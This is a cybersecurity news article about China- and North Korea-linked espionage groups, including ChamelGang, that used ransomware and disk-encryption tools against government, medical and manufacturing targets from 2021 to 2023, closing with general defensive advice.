Hackers Attack Global Infrastructure with Ransomware

Suspected hackers from China and North Korea have been linked to ransomware and data encryption attacks targeting government and critical infrastructure worldwide from 2021 to 2023.

Two distinct groups are involved in these activities. One is associated with ChamelGang (aka CamoFei), while the other overlaps with Chinese and North Korean state-sponsored groups.

ChamelGang’s attacks include incidents at the All India Institute of Medical Sciences (AIIMS) and the Presidency of Brazil in 2022 using CatB ransomware. They also targeted a government entity in East Asia and an aviation organization in the Indian subcontinent in 2023.

“Threat actors in cyber espionage are increasingly using ransomware as a final stage in their operations for financial gain, disruption, distraction, misattribution, or removal of evidence,” noted security researchers.

Ransomware attacks serve not only to sabotage but also to cover tracks by destroying artifacts that could alert defenders to their presence.

ChamelGang, first documented by Positive Technologies in 2021, is believed to be a China-nexus group with varied motivations including intelligence gathering, data theft, financial gain, denial-of-service (DoS) attacks, and information operations.

The group has a wide range of tools, including BeaconLoader, Cobalt Strike, backdoors like AukDoor and DoorMe, and CatB ransomware. The use of CatB in attacks on Brazil and India is confirmed by similarities in ransom notes, contact email addresses, cryptocurrency wallet addresses, and encrypted file extensions.

In 2023, attacks leveraged an updated version of BeaconLoader to deliver Cobalt Strike for reconnaissance and post-exploitation activities, such as dropping additional tools and exfiltrating the NTDS.dit database file.

ChamelGang’s custom malware, including DoorMe and MGDrive (with a macOS variant called Gimmick), has also been linked to other Chinese threat groups like REF2924 and Storm Cloud, suggesting a “digital quartermaster supplying distinct operational groups with malware.”

The other set of intrusions involves using Jetico BestCrypt and Microsoft BitLocker in cyberattacks affecting various industries in North America, South America, and Europe. An estimated 37 organizations, predominantly in the U.S. manufacturing sector, have been targeted.

The tactics observed are consistent with those attributed to the Chinese hacking group APT41 and the North Korean actor Andariel, identified by the presence of tools like the China Chopper web shell and the DTrack backdoor.

Visibility limitations likely prevented detecting the malicious artifacts themselves.

These activities could be part of a broader cybercriminal scheme, as nation-state actors sometimes engage in financially motivated attacks.

“Cyber espionage operations disguised as ransomware activities allow adversarial countries to claim plausible deniability by attributing actions to independent cybercriminal actors rather than state-sponsored entities,” the researchers said.

“The use of ransomware by cyber espionage threat groups blurs the lines between cybercrime and cyber espionage, providing adversaries with strategic and operational advantages.”

To defend against ransomware attacks from state-sponsored hackers, organizations should implement comprehensive security measures such as regular data backups, multi-factor authentication, and network segmentation. Keeping software and systems updated with the latest patches is essential to close vulnerabilities.

Deploying advanced threat detection and response tools can further enhance an organization’s ability to detect and respond to sophisticated attacks.